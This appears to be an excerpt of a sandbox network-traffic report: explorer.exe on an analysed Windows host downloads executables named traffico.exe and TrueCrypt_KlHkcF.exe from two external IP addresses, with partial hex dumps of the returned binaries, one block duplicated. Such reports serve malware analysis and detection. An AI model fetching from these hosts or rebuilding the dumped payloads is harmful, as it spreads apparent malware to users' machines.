00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 3c 00 00 00 20 01 00 00 3e 00 00 00 14 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 78 05 00 00 60 01 00 00 6e 05 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 71 77 72 78 79 62 00 10 00 00 00 e0 06 00 00 0a 00 00 00 c0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 63 71 77 72 62 73 00 04 00 00 00 f0 06 00 3c 02 00 00 00 ca 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$~Xm-Xm-Xm-F-Lm-F-m-F-m-0-[m-Xl-m-Q-Ym-Q-Ym-RichXm-PELhDVeZP @z)< .text `.relocZ.0 `.rdata< >@@.dataxx`nR@.bqwrxyb.rcqwrbs<@
Nov 18, 2023 10:02:30.600019932 CET	1037	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 20 89 4d e0 dd 05 60 2c 41 00 dd 5d f8 b8 01 00 00 00 85 c0 74 1c c7 45 f4 3e 00 00 00 eb 09 Data Ascii: U M`,A]tE>MM}~tEMEE}~3tEVUU}~tEMM}~EMCE]0U
Nov 18, 2023 10:02:30.600033045 CET	1038	IN	Data Raw: 00 00 00 eb 09 8b 4d e4 83 e9 01 89 4d e4 83 7d e4 00 7e 04 eb ef eb ed c7 45 e0 65 60 00 00 8d 4d 14 e8 f1 0c 00 00 8d 4d 48 e8 e9 0c 00 00 8b 45 e0 8b e5 5d c2 60 00 55 8b ec 81 ec 90 00 00 00 89 8d 70 ff ff ff 68 04 24 41 00 8d 4d d4 e8 84 0c Data Ascii: MM}~Ee`MMHE]`Uph$AME,A]E<E,A]h<$AMSPht$AxBP<ExkMcEtEMM}~3tEHEE}
Nov 18, 2023 10:02:30.600049973 CET	1040	IN	Data Raw: 6a 01 8d 45 e0 50 8b 8d 58 ff ff ff e8 01 fd ff ff 8d 4d e0 e8 f9 07 00 00 6a 00 68 54 05 00 00 8d 4d c4 51 8b 8d 58 ff ff ff e8 73 fd ff ff 8d 4d c4 e8 db 07 00 00 83 ec 08 dd 05 60 2d 41 00 dd 1c 24 68 b6 02 00 00 6a 01 83 ec 1c 8b cc 68 34 28 Data Ascii: jEPXMjhTMQXsM`-A$hjh4(Ayht(AjhX-A$P-A$h(A>X#Xxhhh(Ah(AH-A$jh@-A$
Nov 18, 2023 10:02:30.600063086 CET	1041	IN	Data Raw: 33 f6 8b f0 33 c3 8b c3 33 d8 8b c0 8b f3 33 c3 33 f3 80 2f 85 33 db 33 de 8b f6 8b c0 33 c3 33 f3 8b f3 33 c0 8b f6 80 07 39 33 de 8b f0 33 f6 33 f6 8b c6 33 c0 8b f0 33 c0 8b f0 f6 2f 47 e2 ab 5f 5e 5b 5d c3 cc cc cc cc cc cc 55 8b ec 53 56 57 Data Ascii: 33333/33333933333/G_^[]USVWH@pK:9r(%NG)EIB
Nov 18, 2023 10:02:30.600076914 CET	1042	IN	Data Raw: fc 51 8b 4d f8 e8 bc 00 00 00 8b 55 0c 52 6a 00 8b 4d f8 e8 ae 00 00 00 eb 49 6a 00 8b 45 fc 50 8b 4d f8 e8 8e 01 00 00 0f b6 c8 85 c9 74 34 8b 55 fc 52 8b 4d 08 e8 5b 00 00 00 03 45 0c 50 8b 45 f8 8b 48 18 51 8b 4d f8 e8 48 00 00 00 50 e8 92 04 Data Ascii: QMURjMIjEPMt4URM[EPEHQMHPURME]UQME@]UMExrMQUEEE]UMEH;MspUB+E;EsMQ
Nov 18, 2023 10:02:30.600090027 CET	1044	IN	Data Raw: 51 e8 6a 02 00 00 83 c4 14 8b e5 5d c3 cc cc cc 55 8b ec 51 e8 47 02 00 00 88 45 ff 0f b6 45 ff 50 8b 4d 14 51 8b 55 10 52 8b 45 0c 50 8b 4d 08 51 e8 7a 02 00 00 83 c4 14 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 0c 83 7d 08 00 77 09 c7 45 08 00 00 00 Data Ascii: Qj]UQGEEPMQUREPMQz]U}wE%3usjM$hQAEPMQ:]UQMEPMMp-AE]UQMEp-AMy]UQMME
Nov 18, 2023 10:02:30.600102901 CET	1045	IN	Data Raw: 8b ec 56 ff 75 08 8b f1 e8 99 ff ff ff c7 06 a4 2d 41 00 8b c6 5e 5d c2 04 00 c3 b8 2f 5c 40 00 a3 e8 bc 46 00 c7 05 ec bc 46 00 16 53 40 00 c7 05 f0 bc 46 00 ca 52 40 00 c7 05 f4 bc 46 00 03 53 40 00 c7 05 f8 bc 46 00 6c 52 40 00 a3 fc bc 46 00 Data Ascii: Vu-A^]/\@FFS@FR@FS@FlR@FF[@FR@FQ@FwQ@U\.}Ft-]jhRA`;utu=pFuCjO0YeVw0YEtVP0YYE}u7u
Nov 18, 2023 10:02:30.600116968 CET	1046	IN	Data Raw: fc fd ff ff 6a 00 6a 00 6a 00 6a 00 6a 00 8d 45 fc 50 68 23 01 00 00 e8 a1 fe ff ff 83 c4 1c 8b 45 fc 8b 5d 0c 8b 63 1c 8b 6b 20 ff e0 33 c0 40 5b c9 c3 8b ff 55 8b ec 51 53 56 57 8b 7d 08 8b 47 10 8b 77 0c 89 45 fc 8b de eb 2d 83 fe ff 75 05 e8 Data Ascii: jjjjjEPh#E]ck 3@[UQSVW}GwE-u4RMNkM9H};H~uM]u}}EF0E;_w;vQkE_^[UEVuNFN^]UN;Mt@u
Nov 18, 2023 10:02:30.600131035 CET	1048	IN	Data Raw: f3 85 f6 0f 85 48 04 00 00 0f b6 70 02 0f b6 59 02 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 27 04 00 00 0f b6 70 03 0f b6 59 03 2b f3 74 11 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 eb 02 33 f6 85 f6 0f 85 02 04 00 00 8b 70 04 Data Ascii: HpY+t3\'pY+t3\3p;qt~pY+t3\pY+t3\pY+t3\pY+t3\3rp;qt~pY+t
Nov 18, 2023 10:02:30.898447990 CET	1050	IN	Data Raw: e9 0f b6 51 e9 2b f2 74 15 33 d2 85 f6 0f 9f c2 8d 54 12 ff 8b f2 85 f6 0f 85 2d ff ff ff 0f b6 70 ea 0f b6 51 ea 2b f2 74 15 33 d2 85 f6 0f 9f c2 8d 54 12 ff 8b f2 85 f6 0f 85 0c ff ff ff 0f b6 70 eb 0f b6 51 eb 2b f2 74 11 33 d2 85 f6 0f 9f c2 Data Ascii: Q+t3T-pQ+t3TpQ+t3T3P;Qt}Q+t3TpQ+t3TpQ+t3T}pQ+t3T3X

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	192.168.2.4	49741	194.49.94.145	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:30.301103115 CET	1031	OUT	GET /traffico.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 194.49.94.145
Nov 18, 2023 10:02:30.600006104 CET	1036	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:30 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Thu, 16 Nov 2023 16:34:23 GMT ETag: "6ed14-60a4797a219c1" Accept-Ranges: bytes Content-Length: 453908 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c d0 03 7e 58 b1 6d 2d 58 b1 6d 2d 58 b1 6d 2d 46 e3 f8 2d 4c b1 6d 2d 46 e3 ee 2d 01 b1 6d 2d 46 e3 e9 2d 7f b1 6d 2d 9b be 30 2d 5b b1 6d 2d 58 b1 6c 2d 09 b1 6d 2d 51 c9 e9 2d 59 b1 6d 2d 51 c9 fc 2d 59 b1 6d 2d 52 69 63 68 58 b1 6d 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 68 44 56 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 10 01 00 00 b8 05 00 00 00 00 00 5a 50 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 07 00 00 04 00 00 f1 7a 07 00 03 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 29 e6 06 00 14 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c cc 06 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df df 00 00 00 10 00 00 00 e0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 5a 2e 00 00 00 f0 00 00 00 30 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 3c 00 00 00 20 01 00 00 3e 00 00 00 14 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 78 05 00 00 60 01 00 00 6e 05 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 71 77 72 78 79 62 00 10 00 00 00 e0 06 00 00 0a 00 00 00 c0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 63 71 77 72 62 73 00 04 00 00 00 f0 06 00 3c 02 00 00 00 ca 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$~Xm-Xm-Xm-F-Lm-F-m-F-m-0-[m-Xl-m-Q-Ym-Q-Ym-RichXm-PELhDVeZP @z)< .text `.relocZ.0 `.rdata< >@@.dataxx`nR@.bqwrxyb.rcqwrbs<@
Nov 18, 2023 10:02:30.600019932 CET	1037	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 20 89 4d e0 dd 05 60 2c 41 00 dd 5d f8 b8 01 00 00 00 85 c0 74 1c c7 45 f4 3e 00 00 00 eb 09 Data Ascii: U M`,A]tE>MM}~tEMEE}~3tEVUU}~tEMM}~EMCE]0U
Nov 18, 2023 10:02:30.600033045 CET	1038	IN	Data Raw: 00 00 00 eb 09 8b 4d e4 83 e9 01 89 4d e4 83 7d e4 00 7e 04 eb ef eb ed c7 45 e0 65 60 00 00 8d 4d 14 e8 f1 0c 00 00 8d 4d 48 e8 e9 0c 00 00 8b 45 e0 8b e5 5d c2 60 00 55 8b ec 81 ec 90 00 00 00 89 8d 70 ff ff ff 68 04 24 41 00 8d 4d d4 e8 84 0c Data Ascii: MM}~Ee`MMHE]`Uph$AME,A]E<E,A]h<$AMSPht$AxBP<ExkMcEtEMM}~3tEHEE}
Nov 18, 2023 10:02:30.600049973 CET	1040	IN	Data Raw: 6a 01 8d 45 e0 50 8b 8d 58 ff ff ff e8 01 fd ff ff 8d 4d e0 e8 f9 07 00 00 6a 00 68 54 05 00 00 8d 4d c4 51 8b 8d 58 ff ff ff e8 73 fd ff ff 8d 4d c4 e8 db 07 00 00 83 ec 08 dd 05 60 2d 41 00 dd 1c 24 68 b6 02 00 00 6a 01 83 ec 1c 8b cc 68 34 28 Data Ascii: jEPXMjhTMQXsM`-A$hjh4(Ayht(AjhX-A$P-A$h(A>X#Xxhhh(Ah(AH-A$jh@-A$
Nov 18, 2023 10:02:30.600063086 CET	1041	IN	Data Raw: 33 f6 8b f0 33 c3 8b c3 33 d8 8b c0 8b f3 33 c3 33 f3 80 2f 85 33 db 33 de 8b f6 8b c0 33 c3 33 f3 8b f3 33 c0 8b f6 80 07 39 33 de 8b f0 33 f6 33 f6 8b c6 33 c0 8b f0 33 c0 8b f0 f6 2f 47 e2 ab 5f 5e 5b 5d c3 cc cc cc cc cc cc 55 8b ec 53 56 57 Data Ascii: 33333/33333933333/G_^[]USVWH@pK:9r(%NG)EIB
Nov 18, 2023 10:02:30.600076914 CET	1042	IN	Data Raw: fc 51 8b 4d f8 e8 bc 00 00 00 8b 55 0c 52 6a 00 8b 4d f8 e8 ae 00 00 00 eb 49 6a 00 8b 45 fc 50 8b 4d f8 e8 8e 01 00 00 0f b6 c8 85 c9 74 34 8b 55 fc 52 8b 4d 08 e8 5b 00 00 00 03 45 0c 50 8b 45 f8 8b 48 18 51 8b 4d f8 e8 48 00 00 00 50 e8 92 04 Data Ascii: QMURjMIjEPMt4URM[EPEHQMHPURME]UQME@]UMExrMQUEEE]UMEH;MspUB+E;EsMQ
Nov 18, 2023 10:02:30.600090027 CET	1044	IN	Data Raw: 51 e8 6a 02 00 00 83 c4 14 8b e5 5d c3 cc cc cc 55 8b ec 51 e8 47 02 00 00 88 45 ff 0f b6 45 ff 50 8b 4d 14 51 8b 55 10 52 8b 45 0c 50 8b 4d 08 51 e8 7a 02 00 00 83 c4 14 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 0c 83 7d 08 00 77 09 c7 45 08 00 00 00 Data Ascii: Qj]UQGEEPMQUREPMQz]U}wE%3usjM$hQAEPMQ:]UQMEPMMp-AE]UQMEp-AMy]UQMME
Nov 18, 2023 10:02:30.600102901 CET	1045	IN	Data Raw: 8b ec 56 ff 75 08 8b f1 e8 99 ff ff ff c7 06 a4 2d 41 00 8b c6 5e 5d c2 04 00 c3 b8 2f 5c 40 00 a3 e8 bc 46 00 c7 05 ec bc 46 00 16 53 40 00 c7 05 f0 bc 46 00 ca 52 40 00 c7 05 f4 bc 46 00 03 53 40 00 c7 05 f8 bc 46 00 6c 52 40 00 a3 fc bc 46 00 Data Ascii: Vu-A^]/\@FFS@FR@FS@FlR@FF[@FR@FQ@FwQ@U\.}Ft-]jhRA`;utu=pFuCjO0YeVw0YEtVP0YYE}u7u
Nov 18, 2023 10:02:30.600116968 CET	1046	IN	Data Raw: fc fd ff ff 6a 00 6a 00 6a 00 6a 00 6a 00 8d 45 fc 50 68 23 01 00 00 e8 a1 fe ff ff 83 c4 1c 8b 45 fc 8b 5d 0c 8b 63 1c 8b 6b 20 ff e0 33 c0 40 5b c9 c3 8b ff 55 8b ec 51 53 56 57 8b 7d 08 8b 47 10 8b 77 0c 89 45 fc 8b de eb 2d 83 fe ff 75 05 e8 Data Ascii: jjjjjEPh#E]ck 3@[UQSVW}GwE-u4RMNkM9H};H~uM]u}}EF0E;_w;vQkE_^[UEVuNFN^]UN;Mt@u
Nov 18, 2023 10:02:30.600131035 CET	1048	IN	Data Raw: f3 85 f6 0f 85 48 04 00 00 0f b6 70 02 0f b6 59 02 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 27 04 00 00 0f b6 70 03 0f b6 59 03 2b f3 74 11 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 eb 02 33 f6 85 f6 0f 85 02 04 00 00 8b 70 04 Data Ascii: HpY+t3\'pY+t3\3p;qt~pY+t3\pY+t3\pY+t3\pY+t3\3rp;qt~pY+t
Nov 18, 2023 10:02:30.898447990 CET	1050	IN	Data Raw: e9 0f b6 51 e9 2b f2 74 15 33 d2 85 f6 0f 9f c2 8d 54 12 ff 8b f2 85 f6 0f 85 2d ff ff ff 0f b6 70 ea 0f b6 51 ea 2b f2 74 15 33 d2 85 f6 0f 9f c2 8d 54 12 ff 8b f2 85 f6 0f 85 0c ff ff ff 0f b6 70 eb 0f b6 51 eb 2b f2 74 11 33 d2 85 f6 0f 9f c2 Data Ascii: Q+t3T-pQ+t3TpQ+t3T3P;Qt}Q+t3TpQ+t3TpQ+t3T}pQ+t3T3X

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	192.168.2.4	49744	194.49.94.120	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:33.215631008 CET	1529	OUT	GET /TrueCrypt_KlHkcF.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 194.49.94.120
Nov 18, 2023 10:02:33.514277935 CET	1531	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:33 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 17 Nov 2023 12:07:50 GMT ETag: "103e000-60a57fc402bac" Accept-Ranges: bytes Content-Length: 17031168 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 68 6c 00 00 dc 03 01 00 d2 06 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 30 0b 01 00 04 00 00 61 9e 04 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 d0 08 01 4e 00 00 00 00 e0 08 01 64 13 00 00 00 20 09 01 d8 16 00 00 00 d0 01 01 80 0d 00 00 00 00 00 00 00 00 00 00 00 40 09 01 20 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 b9 01 01 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 e4 08 01 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 67 6c 00 00 10 00 00 00 68 6c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 60 60 2e 64 61 74 61 00 00 00 70 b9 06 00 00 80 6c 00 00 ba 06 00 00 6c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 87 8e 00 00 40 73 00 00 88 8e 00 00 26 73 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 80 0d 00 00 00 d0 01 01 00 0e 00 00 00 ae 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 90 0b 00 00 00 e0 01 01 00 0c 00 00 00 bc 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 e0 d0 06 00 00 f0 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 4e 00 00 00 00 d0 08 01 00 02 00 00 00 c8 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 64 13 00 00 00 e0 08 01 00 14 00 00 00 ca 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 70 00 00 00 00 00 09 01 00 02 00 00 00 de 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 09 01 00 02 00 00 00 e0 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 d8 16 00 00 00 20 09 01 00 18 00 00 00 e2 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 20 e4 01 00 00 40 09 01 00 e6 01 00 00 fa 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$hl@0a` Nd @ `(d(.textglhl```.dataplll@`.rdatap@s&s@`@.pdata@0@.xdata@0@.bss`.edataN@0@.idatad@0.CRTp@@.tls@@.rsrc @0.reloc @@0B
Nov 18, 2023 10:02:33.514421940 CET	1532	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 05 b0 01 01 31 c9 c7 00 01 Data Ascii: ff.@H(H1HHHHof8MZuHcP<H8PEtiHtF_l'flH0flH7kH8tS1H(@
Nov 18, 2023 10:02:33.514436007 CET	1533	IN	Data Raw: ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 15 ab 01 01 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 e8 c7 5a 6c 00 48 85 c0 0f 94 c0 0f b6 c0 f7 d8 48 83 c4 28 c3 90 90 90 90 90 90 90 48 8d 0d 09 00 00 Data Ascii: H(H(HH(H(ZlHH(H@I;fv8HHl$Hl$HD$ H\$(fHD$ H\$(,Hl$HHD$H\$sHD$H\$Ld$M;f*HH$H$H
Nov 18, 2023 10:02:33.514447927 CET	1535	IN	Data Raw: 24 1f 44 88 4c 3e 19 48 8b 74 24 78 4c 8b 44 24 50 e9 e0 fb ff ff e8 eb c4 03 00 48 8d 05 76 d8 8a 00 bb 1e 00 00 00 e8 da cd 03 00 48 8b 44 24 60 48 8b 5c 24 48 e8 cb cd 03 00 48 8d 05 ed 81 89 00 bb 02 00 00 00 e8 ba cd 03 00 e8 35 c5 03 00 48 Data Ascii: $DL>Ht$xLD$PHvHD$`H\$HH5Ht$xLD$PA;6ETICH9tH55L&5H9s(IHADH5L5I9rLLHHHHDHHp
Nov 18, 2023 10:02:33.514461040 CET	1536	IN	Data Raw: 02 01 48 8b 0d b7 30 02 01 48 39 d9 73 37 bf 05 00 00 00 48 8d 35 86 81 83 00 e8 a1 fb 04 00 48 89 0d 9a 30 02 01 83 3d 63 ac 07 01 00 75 09 48 89 05 7a 30 02 01 eb 0d 48 8d 3d 71 30 02 01 90 e8 bb f1 06 00 48 89 1d 6c 30 02 01 48 8d 4b fb 48 c1 Data Ascii: H0H9s7H5H0=cuHz0H=q0Hl0HKHHDfDH<HHRHH[ H4Hv0LM@@LMIPLMR`LM[pL$M$L,M=fuHBHHNHT!ML&HH.
Nov 18, 2023 10:02:33.514473915 CET	1537	IN	Data Raw: 01 d0 89 44 24 08 89 54 24 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c7 44 24 08 01 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 59 48 83 ec 20 48 89 6c 24 18 48 8d 6c 24 18 48 8b 48 08 Data Ascii: D$T$D$I;fvYH Hl$Hl$HHHH0fH9Ku-HxH9{u#x@8{uxf@8{uHHO1Hl$H HD$H\$rHD$H\$I;fH(Hl$ Hl$ HD$0H\$81HL$HH\$8HD$0H
Nov 18, 2023 10:02:33.514486074 CET	1539	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 c1 48 d1 e8 48 ba 55 55 55 55 55 55 55 55 48 21 d0 48 21 ca 48 8d 0c 02 48 89 ca 48 c1 e9 02 48 bb 33 33 33 33 33 33 33 33 48 21 d9 48 21 d3 48 01 d9 48 89 ca 48 c1 e9 04 48 01 d1 Data Ascii: HHHUUUUUUUUH!H!HHHH33333333H!H!HHHHHH!HHHHHHHH HL$@M;fMH@H$8H$8H$HH}
Nov 18, 2023 10:02:33.514498949 CET	1540	IN	Data Raw: e8 09 c1 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb bd cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 52 02 00 00 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 7c 24 68 31 d2 Data Ascii: HD$H\$I;fRHHHl$@Hl$@HD$PH\|$h1E1MHDiFCML9IAAEEHEEHEEH1E1L^EiD,0G,LI9~H9wH\$XHD$PLD$8HL$`H\|$hDT$T
Nov 18, 2023 10:02:33.514513016 CET	1541	IN	Data Raw: c4 e2 06 00 48 89 f8 48 89 d9 e8 79 e2 06 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 0f 1f 40 00 e8 db bb 06 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 a2 fd ff ff cc cc 48 89 44 24 08 31 c9 31 d2 eb Data Ascii: HHyHD$H\$HL$H\|$ @HD$H\$HL$H\|$ HD$114LB@8IDHH9HHD$11<LF@8IDHH9H=<tH?H
Nov 18, 2023 10:02:33.514523029 CET	1543	IN	Data Raw: cc cc 80 3d 03 9b 07 01 01 74 05 e9 d2 06 00 00 48 8b 74 24 08 48 8b 5c 24 10 8a 44 24 20 4c 8d 44 24 28 e9 5a fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 80 3d c3 9a 07 01 01 74 05 e9 f2 06 00 00 48 8b Data Ascii: =tHt$H\$D$ LD$(Z=tHt$H\$D$LD$ HH@=hthH@oooVo_of oo ov0o0ftftftftffffH@
